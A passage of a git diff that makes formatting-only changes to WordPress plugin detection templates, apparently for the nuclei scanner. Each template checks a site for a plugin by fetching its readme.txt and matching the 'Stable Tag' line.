'(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-forminator.yaml b/technologies/wordpress/wordpress-forminator.yaml index 53eb2646f7..6076a0b75f 100644 --- a/technologies/wordpress/wordpress-forminator.yaml +++ b/technologies/wordpress/wordpress-forminator.yaml @@ -1,4 +1,3 @@ - id: wordpress-forminator info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/forminator/ metadata: plugin_namespace: forminator - wpscan: https://wpscan.com/plugin/forminator + wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/forminator/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-ga-google-analytics.yaml b/technologies/wordpress/wordpress-ga-google-analytics.yaml index 3aa6124521..645da5eb5c 100644 --- a/technologies/wordpress/wordpress-ga-google-analytics.yaml +++ b/technologies/wordpress/wordpress-ga-google-analytics.yaml @@ -1,4 +1,3 @@ - id: wordpress-ga-google-analytics info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/ga-google-analytics/ metadata: plugin_namespace: ga-google-analytics - wpscan: https://wpscan.com/plugin/ga-google-analytics + wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/ga-google-analytics/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml b/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml index 1f88894df5..42d2f8d957 100644 --- a/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml +++ b/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml @@ -1,4 +1,3 @@ - id: wordpress-google-analytics-dashboard-for-wp info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: plugin_namespace: google-analytics-dashboard-for-wp - wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp + wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/google-analytics-dashboard-for-wp/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml b/technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml index d6900299a0..acd5741333 100644 --- a/technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml +++ b/technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml @@ -1,4 +1,3 @@ - id: wordpress-google-analytics-for-wordpress info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: plugin_namespace: google-analytics-for-wordpress - wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress + wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/google-analytics-for-wordpress/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-google-listings-and-ads.yaml b/technologies/wordpress/wordpress-google-listings-and-ads.yaml index 95f8167b77..a9ccc18d46 100644 --- a/technologies/wordpress/wordpress-google-listings-and-ads.yaml +++ b/technologies/wordpress/wordpress-google-listings-and-ads.yaml @@ -1,4 +1,3 @@ - id: wordpress-google-listings-and-ads info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: plugin_namespace: google-listings-and-ads - wpscan: https://wpscan.com/plugin/google-listings-and-ads + wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/google-listings-and-ads/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-google-site-kit.yaml b/technologies/wordpress/wordpress-google-site-kit.yaml index 5addb0fd39..09c481001f 100644 --- a/technologies/wordpress/wordpress-google-site-kit.yaml +++ b/technologies/wordpress/wordpress-google-site-kit.yaml @@ -1,4 +1,3 @@ - id: wordpress-google-site-kit info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/google-site-kit/ metadata: plugin_namespace: google-site-kit - wpscan: https://wpscan.com/plugin/google-site-kit + wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/google-site-kit/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-google-sitemap-generator.yaml b/technologies/wordpress/wordpress-google-sitemap-generator.yaml index 2ebe4ea6cc..3fe6b5c61b 100644 --- a/technologies/wordpress/wordpress-google-sitemap-generator.yaml +++ b/technologies/wordpress/wordpress-google-sitemap-generator.yaml @@ -1,4 +1,3 @@ - id: wordpress-google-sitemap-generator info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: plugin_namespace: google-sitemap-generator - wpscan: https://wpscan.com/plugin/google-sitemap-generator + wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/google-sitemap-generator/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-gtranslate.yaml b/technologies/wordpress/wordpress-gtranslate.yaml index a3afa21fcc..c13d28ebc5 100644 --- a/technologies/wordpress/wordpress-gtranslate.yaml +++ b/technologies/wordpress/wordpress-gtranslate.yaml @@ -1,4 +1,3 @@ - id: wordpress-gtranslate info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/gtranslate/ metadata: plugin_namespace: gtranslate - wpscan: https://wpscan.com/plugin/gtranslate + wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/gtranslate/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-gutenberg.yaml b/technologies/wordpress/wordpress-gutenberg.yaml index a239ddcdc7..5ef5e08b0a 100644 --- a/technologies/wordpress/wordpress-gutenberg.yaml +++ b/technologies/wordpress/wordpress-gutenberg.yaml @@ -1,4 +1,3 @@ - id: wordpress-gutenberg info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/gutenberg/ metadata: plugin_namespace: gutenberg - wpscan: https://wpscan.com/plugin/gutenberg + wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/gutenberg/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-happy-elementor-addons.yaml b/technologies/wordpress/wordpress-happy-elementor-addons.yaml index 03b08a4487..dc59110ada 100644 --- a/technologies/wordpress/wordpress-happy-elementor-addons.yaml +++ b/technologies/wordpress/wordpress-happy-elementor-addons.yaml @@ -1,4 +1,3 @@ - id: wordpress-happy-elementor-addons info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: plugin_namespace: happy-elementor-addons - wpscan: https://wpscan.com/plugin/happy-elementor-addons + wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/happy-elementor-addons/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-header-and-footer-scripts.yaml b/technologies/wordpress/wordpress-header-and-footer-scripts.yaml index 77f6822157..b42e0f04f8 100644 --- a/technologies/wordpress/wordpress-header-and-footer-scripts.yaml +++ b/technologies/wordpress/wordpress-header-and-footer-scripts.yaml @@ -1,4 +1,3 @@ - id: wordpress-header-and-footer-scripts info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: plugin_namespace: header-and-footer-scripts - wpscan: https://wpscan.com/plugin/header-and-footer-scripts + wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/header-and-footer-scripts/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-header-footer-code-manager.yaml b/technologies/wordpress/wordpress-header-footer-code-manager.yaml index 91e8c49c0f..c28b9683f4 100644 --- a/technologies/wordpress/wordpress-header-footer-code-manager.yaml +++ b/technologies/wordpress/wordpress-header-footer-code-manager.yaml @@ -1,4 +1,3 @@ - id: wordpress-header-footer-code-manager info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: plugin_namespace: header-footer-code-manager - wpscan: https://wpscan.com/plugin/header-footer-code-manager + wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/header-footer-code-manager/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-header-footer-elementor.yaml b/technologies/wordpress/wordpress-header-footer-elementor.yaml index 85ee27fcf7..ddbc28de7f 100644 --- a/technologies/wordpress/wordpress-header-footer-elementor.yaml +++ b/technologies/wordpress/wordpress-header-footer-elementor.yaml @@ -1,4 +1,3 @@ - id: wordpress-header-footer-elementor info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/header-footer-elementor/ metadata: plugin_namespace: header-footer-elementor - wpscan: https://wpscan.com/plugin/header-footer-elementor + wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/header-footer-elementor/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-header-footer.yaml b/technologies/wordpress/wordpress-header-footer.yaml index 5c86a25430..0f84e844a1 100644 --- a/technologies/wordpress/wordpress-header-footer.yaml +++ b/technologies/wordpress/wordpress-header-footer.yaml @@ -1,4 +1,3 @@ - id: wordpress-header-footer info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/header-footer/ metadata: plugin_namespace: header-footer - wpscan: https://wpscan.com/plugin/header-footer + wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/header-footer/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-health-check.yaml b/technologies/wordpress/wordpress-health-check.yaml index ee0d16bb89..5ad82da89c 100644 --- a/technologies/wordpress/wordpress-health-check.yaml +++ b/technologies/wordpress/wordpress-health-check.yaml @@ -1,4 +1,3 @@ - id: wordpress-health-check info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/health-check/ metadata: plugin_namespace: health-check - wpscan: https://wpscan.com/plugin/health-check + wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/health-check/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-hello-dolly.yaml b/technologies/wordpress/wordpress-hello-dolly.yaml index 8d5ce9e57e..9342e72432 100644 --- a/technologies/wordpress/wordpress-hello-dolly.yaml +++ b/technologies/wordpress/wordpress-hello-dolly.yaml @@ -1,4 +1,3 @@ - id: wordpress-hello-dolly info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/hello-dolly/ metadata: plugin_namespace: hello-dolly - wpscan: https://wpscan.com/plugin/hello-dolly + wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/hello-dolly/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-imagify.yaml b/technologies/wordpress/wordpress-imagify.yaml index 0e5dada799..34d8762e56 100644 --- a/technologies/wordpress/wordpress-imagify.yaml +++ b/technologies/wordpress/wordpress-imagify.yaml @@ -1,4 +1,3 @@ - id: wordpress-imagify info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/imagify/ metadata: plugin_namespace: imagify - wpscan: https://wpscan.com/plugin/imagify + wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/imagify/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-imsanity.yaml b/technologies/wordpress/wordpress-imsanity.yaml index c8ef58a742..ec1cd229bf 100644 --- a/technologies/wordpress/wordpress-imsanity.yaml +++ b/technologies/wordpress/wordpress-imsanity.yaml @@ -1,4 +1,3 @@ - id: wordpress-imsanity info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/imsanity/ metadata: plugin_namespace: imsanity - wpscan: https://wpscan.com/plugin/imsanity + wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/imsanity/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-insert-headers-and-footers.yaml b/technologies/wordpress/wordpress-insert-headers-and-footers.yaml index feeffbfba4..93743dff46 100644 --- a/technologies/wordpress/wordpress-insert-headers-and-footers.yaml +++ b/technologies/wordpress/wordpress-insert-headers-and-footers.yaml @@ -1,4 +1,3 @@ - id: wordpress-insert-headers-and-footers info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: plugin_namespace: insert-headers-and-footers - wpscan: https://wpscan.com/plugin/insert-headers-and-footers + wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/insert-headers-and-footers/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-instagram-feed.yaml b/technologies/wordpress/wordpress-instagram-feed.yaml index 1f2082468c..9f88191da7 100644 --- a/technologies/wordpress/wordpress-instagram-feed.yaml +++ b/technologies/wordpress/wordpress-instagram-feed.yaml @@ -1,4 +1,3 @@ - id: wordpress-instagram-feed info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/instagram-feed/ metadata: plugin_namespace: instagram-feed - wpscan: https://wpscan.com/plugin/instagram-feed + wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/instagram-feed/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-intuitive-custom-post-order.yaml b/technologies/wordpress/wordpress-intuitive-custom-post-order.yaml index e2b5d70e42..0cfa0cb97c 100644 --- a/technologies/wordpress/wordpress-intuitive-custom-post-order.yaml +++ b/technologies/wordpress/wordpress-intuitive-custom-post-order.yaml @@ -1,4 +1,3 @@ - id: wordpress-intuitive-custom-post-order info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: plugin_namespace: intuitive-custom-post-order - wpscan: https://wpscan.com/plugin/intuitive-custom-post-order + wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/intuitive-custom-post-order/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-iwp-client.yaml b/technologies/wordpress/wordpress-iwp-client.yaml index f845dbd46d..827c0cc379 100644 --- a/technologies/wordpress/wordpress-iwp-client.yaml +++ b/technologies/wordpress/wordpress-iwp-client.yaml @@ -1,4 +1,3 @@ - id: wordpress-iwp-client info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/iwp-client/ metadata: plugin_namespace: iwp-client - wpscan: https://wpscan.com/plugin/iwp-client + wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/iwp-client/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-jetpack.yaml b/technologies/wordpress/wordpress-jetpack.yaml index c809e7d16f..49384cf7fe 100644 --- a/technologies/wordpress/wordpress-jetpack.yaml +++ b/technologies/wordpress/wordpress-jetpack.yaml @@ -1,4 +1,3 @@ - id: wordpress-jetpack info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/jetpack/ metadata: plugin_namespace: jetpack - wpscan: https://wpscan.com/plugin/jetpack + wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/jetpack/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-kadence-blocks.yaml b/technologies/wordpress/wordpress-kadence-blocks.yaml index 0afb440920..2b5d26998e 100644 --- a/technologies/wordpress/wordpress-kadence-blocks.yaml +++ b/technologies/wordpress/wordpress-kadence-blocks.yaml @@ -1,4 +1,3 @@ - id: wordpress-kadence-blocks info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/kadence-blocks/ metadata: plugin_namespace: kadence-blocks - wpscan: https://wpscan.com/plugin/kadence-blocks + wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/kadence-blocks/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-kirki.yaml b/technologies/wordpress/wordpress-kirki.yaml index d0327f7774..e114983549 100644 --- a/technologies/wordpress/wordpress-kirki.yaml +++ b/technologies/wordpress/wordpress-kirki.yaml @@ -1,4 +1,3 @@ - id: wordpress-kirki info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/kirki/ metadata: plugin_namespace: kirki - wpscan: https://wpscan.com/plugin/kirki + wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/kirki/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-leadin.yaml b/technologies/wordpress/wordpress-leadin.yaml index 25d12526da..a787b81ace 100644 --- a/technologies/wordpress/wordpress-leadin.yaml +++ b/technologies/wordpress/wordpress-leadin.yaml @@ -1,4 +1,3 @@ - id: wordpress-leadin info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/leadin/ metadata: plugin_namespace: leadin - wpscan: https://wpscan.com/plugin/leadin + wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/leadin/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml b/technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml index 25df5be501..01497562af 100644 --- a/technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml +++ b/technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml @@ -1,4 +1,3 @@ - id: wordpress-limit-login-attempts-reloaded info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: plugin_namespace: limit-login-attempts-reloaded - wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded + wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/limit-login-attempts-reloaded/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-limit-login-attempts.yaml b/technologies/wordpress/wordpress-limit-login-attempts.yaml index 4eee9b04ba..161cebe4fd 100644 --- a/technologies/wordpress/wordpress-limit-login-attempts.yaml +++ b/technologies/wordpress/wordpress-limit-login-attempts.yaml @@ -1,4 +1,3 @@ - id: wordpress-limit-login-attempts info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/limit-login-attempts/ metadata: plugin_namespace: limit-login-attempts - wpscan: https://wpscan.com/plugin/limit-login-attempts + wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/limit-login-attempts/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-litespeed-cache.yaml b/technologies/wordpress/wordpress-litespeed-cache.yaml index 6192bf3ffc..e005b9ca3c 100644 --- a/technologies/wordpress/wordpress-litespeed-cache.yaml +++ b/technologies/wordpress/wordpress-litespeed-cache.yaml @@ -1,4 +1,3 @@ - id: wordpress-litespeed-cache info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/litespeed-cache/ metadata: plugin_namespace: litespeed-cache - wpscan: https://wpscan.com/plugin/litespeed-cache + wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-loco-translate.yaml b/technologies/wordpress/wordpress-loco-translate.yaml index df51bdc84c..46b1fb2d7e 100644 --- a/technologies/wordpress/wordpress-loco-translate.yaml +++ b/technologies/wordpress/wordpress-loco-translate.yaml @@ -1,4 +1,3 @@ - id: wordpress-loco-translate info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/loco-translate/ metadata: plugin_namespace: loco-translate - wpscan: https://wpscan.com/plugin/loco-translate + wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/loco-translate/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-loginizer.yaml b/technologies/wordpress/wordpress-loginizer.yaml index a0a5638813..29c1a921e6 100644 --- a/technologies/wordpress/wordpress-loginizer.yaml +++ b/technologies/wordpress/wordpress-loginizer.yaml @@ -1,4 +1,3 @@ - id: wordpress-loginizer info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/loginizer/ metadata: plugin_namespace: loginizer - wpscan: https://wpscan.com/plugin/loginizer + wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/loginizer/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-loginpress.yaml b/technologies/wordpress/wordpress-loginpress.yaml index 950176ff47..de3cefa629 100644 --- a/technologies/wordpress/wordpress-loginpress.yaml +++ b/technologies/wordpress/wordpress-loginpress.yaml @@ -1,4 +1,3 @@ - id: wordpress-loginpress info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/loginpress/ metadata: plugin_namespace: loginpress - wpscan: https://wpscan.com/plugin/loginpress + wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/loginpress/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml b/technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml index c6346c8f36..a3355724ce 100644 --- a/technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml +++ b/technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml @@ -1,4 +1,3 @@ - id: wordpress-mailchimp-for-woocommerce info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: plugin_namespace: mailchimp-for-woocommerce - wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce + wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/mailchimp-for-woocommerce/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-mailpoet.yaml b/technologies/wordpress/wordpress-mailpoet.yaml index 381ba2c505..b37ef901c6 100644 --- a/technologies/wordpress/wordpress-mailpoet.yaml +++ b/technologies/wordpress/wordpress-mailpoet.yaml @@ -1,4 +1,3 @@ - id: wordpress-mailpoet info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/mailpoet/ metadata: plugin_namespace: mailpoet - wpscan: https://wpscan.com/plugin/mailpoet + wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/mailpoet/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-maintenance.yaml 